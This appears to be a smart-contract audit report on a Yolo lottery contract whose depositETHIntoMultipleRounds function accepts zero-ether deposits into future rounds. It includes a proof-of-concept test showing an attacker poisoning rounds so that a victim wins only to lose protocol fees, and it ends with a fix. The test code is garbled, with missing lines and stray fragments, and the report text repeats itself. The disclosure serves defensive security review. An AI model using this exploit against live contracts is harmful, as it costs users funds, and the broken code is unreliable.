depositETHIntoMultipleRounds lets users deposit 0 ether leading to losses by participation
Users are able to deposit zero ether into future rounds using the function depositETHIntoMultipleRounds, using this an adversary can poison rounds which will lead to loss of user funds.
Vulnerability Detail
depositETHIntoMultipleRounds function lacks the necessary checks to make sure each deposit is not zero, it initially checks the deposit which is towards the current open round and later checks the total expected deposit, therefore for the next rounds a user can make deposits of zero ether. At this point an adversary can make MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND - 1 deposits into any number of rounds, only depositing funds into the current open round. Whenever a victim makes a deposit into these future rounds filled with zero deposits, they will be winning the round (drawing will trigger due to deposits reaching limit and number of participants being greater than one) but only to pay protocol fees and gas, ultimately losing funds.
Malicious users can poison rounds which will make users lose funds by participating in the game, making this vulnerability high impact.
Add this test to Yolo.depositETHIntoMultipleRounds.t.sol.
function test_depositETHIntoMultipleRounds_DepositZeroEth() public {
uint256[] memory amounts = new uint256[](4);
amounts[0] = 0.01 ether;
amounts[1] = 0 ether;
amounts[2] = 0 ether;
amounts[3] = 0 ether;, 10 ether);
//attacker deposits MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND - 1 times into 4 rounds
for (uint256 i = 1; i <= 99; i++) {
yolo.depositETHIntoMultipleRounds{value: 0.01 ether}(amounts);
IYoloV2.Deposit[] memory deposits
) = yolo.getRound(2);
//attacker was able to deposit 0 eth
assertEq(deposits[0].tokenAmount, 0);
amounts = new uint256[](2);
amounts[0] = 5 ether;
amounts[1] = 5 ether;, 20 ether);
//victim deposits 5 ether to two rounds
yolo.depositETHIntoMultipleRounds{value: 10 ether}(amounts);
//first round goes through automatically as it reaches max deposit number
(IYoloV2.RoundStatus status, , , , , , , , , ) = yolo.getRound(1);
assertEq(uint8(status), uint8(IYoloV2.RoundStatus.Drawing));
uint256[] memory randomWords = new uint256[](1);
randomWords[0] = 2345782359082359082359082359239741234971239412349234892349234;
VRFConsumerBaseV2(yolo).rawFulfillRandomWords(FULFILL_RANDOM_WORDS_REQUEST_ID, randomWords);
address winner;
(status, , , , , , winner, , , ) = yolo.getRound(1);
assertEq(uint8(status), uint8(IYoloV2.RoundStatus.Drawn));
assertEq(winner, user2);
//similar to first round
VRFConsumerBaseV2(yolo).rawFulfillRandomWords(FULFILL_RANDOM_WORDS_REQUEST_ID_2, randomWords);
(status, , , , , , winner, , , ) = yolo.getRound(2);
assertEq(uint8(status), uint8(IYoloV2.RoundStatus.Drawn));
assertEq(winner, user2);
//victim claims prizes for round 2 which has been filled with deposits of zero
uint256[] memory prizesIndices = new uint256[](100);
for(uint256 i = 0; i < 100; i++){
prizesIndices[i] = i;
IYoloV2.WithdrawalCalldata[] memory withdrawalCalldata = new IYoloV2.WithdrawalCalldata[](1);
withdrawalCalldata[0].roundId = 2;
withdrawalCalldata[0].depositIndices = prizesIndices;
yolo.claimPrizes(withdrawalCalldata, false);
//victim is in loss of 0.15 ether
assertEq(user2.balance, 14.85 ether);
depositETHIntoMultipleRounds lets users deposit 0 ether leading to losses by participation
Users are able to deposit zero ether into future rounds using the function depositETHIntoMultipleRounds, using this an adversary can poison rounds which will lead to loss of user funds.
Vulnerability Detail
depositETHIntoMultipleRounds function lacks the necessary checks to make sure each deposit is not zero, it initially checks the deposit which is towards the current open round and later checks the total expected deposit, therefore for the next rounds a user can make deposits of zero ether. At this point an adversary can make
deposits into any number of rounds, only depositing funds into the current open round. Whenever a victim makes a deposit into these future rounds filled with zero deposits, they will be winning the round (drawing will trigger due to deposits reaching limit and number of participants being greater than one) but only to pay protocol fees and gas, ultimately losing funds.Impact
Malicious users can poison rounds which will make users lose funds by participating in the game, making this vulnerability high impact.
Add this test to Yolo.depositETHIntoMultipleRounds.t.sol.
Code Snippet
depositETHIntoMultipleRounds function:
Tool used
Manual Review
Add a zero check for each deposit here.
Duplicate of #18